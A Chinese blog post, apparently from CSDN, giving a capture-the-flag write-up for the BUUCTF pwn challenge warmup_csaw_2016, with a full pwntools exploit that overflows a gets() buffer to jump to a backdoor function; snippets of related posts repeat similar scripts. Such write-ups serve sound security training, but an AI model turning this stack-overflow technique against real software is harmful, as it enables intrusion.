BUU CTF PWN warmup_csaw_2016 WriteUp

原创 已于 2023-04-04 09:19:23 修改 · 300 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #python #网络安全 #信息安全 #WriteUp

于 2022-02-27 12:14:00 首次发布
这篇博客详细解析了一个名为Warmup_csaw_2016的程序,展示了如何通过checksec工具发现无保护措施,并利用sprintf和gets漏洞进行栈溢出攻击。特别关注了后门函数的存在,以及缺乏Canary导致的地址暴露。作者提供了完整的exploit代码,展示了从地址获取到交互式的攻击过程。

warmup_csaw_2016

使用checksec查看:
在这里插入图片描述
保护措施全部关闭。

放进IDA中分析:
在这里插入图片描述

  • sprintf(&s, "%p\n", sub_40060D);:直接打印出了函数sub_40060D的地址。
  • return gets(&v5, ">");:存在栈溢出

sub_40060D()
在这里插入图片描述

  • 存在后门函数

步骤解析

程序会输出后门函数的地址,直接拿来使用。

不存在Canary,栈溢出直接覆盖返回地址。

完整exp

from pwn import *

# r = process("../buu/warmup_csaw_2016")
r = remote("node4.buuoj.cn",28223)
addr = 0x40060D
payload = b'M'*(0x40+8) + p64(addr)
r.recv()
r.sendline(payload)

r.interactive()
warmup_csaw_2016
weixin_56301399的博客
07-20 1666
做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。偏移量的计算=(数组本身大小+对应位的偏移64位是ox8)然后加上我们系统调用函数的地址。...
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1406
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
warmup_csaw_2016 1
weixin_52034946的博客
01-13 958
先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出 脚本 from pwn import* r=remote(‘node3.buuoj.cn’,28011) flag_addr = 0x40060D payload = ‘a’*(0x40+8)+p6
[BUUCTF-PWN] warmup_csaw_2016
最新发布
weixin_44570459的博客
10-07 120
3、双击后通过ctrl+x交叉引用,定位这个敏感字符串在sub_40060D这个地址函数中被调用。4、进一步跟踪该地址函数,发现该函数为后门函数,通过系统调用读取flag.txt。1、发现存在gets函数,可导致栈溢出漏洞,其中v5长度为0x40。2、通过shitf+F12发现敏感字符串:cat flag.txt。
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 487
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
BUUCTF-warmup_csaw_2016
m0_64180167的博客
04-11 559
64位的linux文件。
Pwn | CTFBUUCTF warmup_csaw_2016
weixin_46301214的博客
02-04 543
天命:第二题pwn,这次知道了目标就是瞄准system函数,如果里面是 /bin/sh 之类的就是直接getshell,如果是普通命令的话,应该就是getflag了。点进去变量,然后这里开始我就不懂了,别人wp就说这里是40空间+8空间(8空间就是覆盖64位下rbp的长度)sub_40060D这个函数就是重点,点进去一看就是我们的目标system("cat flag.txt")那就要拿到两个东西:sub_40060D函数的入口地址 和 v5变量的缓冲区大小。条件一:获取sub_40060D函数入口地址。
BUUCTF pwn——warmup_csaw_2016
CNS-Enterprise BCC-1701-J
03-11 213
BUUCTF 做题练习
BUUCTF PWN wp--warmup_csaw_2016
2302_81740139的博客
08-19 1335
这个数组在栈帧中的位置相对于基指针ebp是偏移量-40的地方(如果ebp指向栈帧的底部),这通常意味着它是函数中的一个局部变量。PIE(Position-Independent Executable)是一种安全特性,它使得程序的代码可以在内存中的任意位置加载,这样每次程序运行时地址空间布局都是随机的,增加了利用内存损坏漏洞的难度。在函数开始执行时,如果函数要使用某些寄存器,并且这些寄存器在调用者中之后还需要使用,那么这些寄存器的值需要在栈上保存,以便在函数返回前恢复。仅为个人理解,如有错误,请指正。
BUUCTF-PWN题详解(warmup_csaw_2016&ciscn_2019_n_1)
2302_80325559的博客
11-26 1255
在文章后面补充了栈的知识点,大佬们可以先看看然后再看题解。
BUUCTF-PWN】3-warmup_csaw_2016
燕麦葡萄干的博客
07-04 381
checksec检查是64位,未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。
BUUctf warmup_csaw_2016
A_fish_like_sing的博客
03-14 490
buu ctf pwn warmup_csaw_2016
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 695
buuctf pwn
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 1124
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 5902
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
Buuctf pwn warmup_csaw_2016
2301_79960856的博客
02-29 434
字符串窗口中发现flag,并寻其地址为40060d。main函数中发现gets函数造成栈溢出。总大小为0×40+0×8。2.放入ida64反编译。
buuoj warmup_csaw_2016
weixin_52942048的博客
10-15 177
(1)v5的长度是40(双击点进去就可以看到长度)这里确定执行 cat flag.txt的地址即可。(2)返回地址8个字节。
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值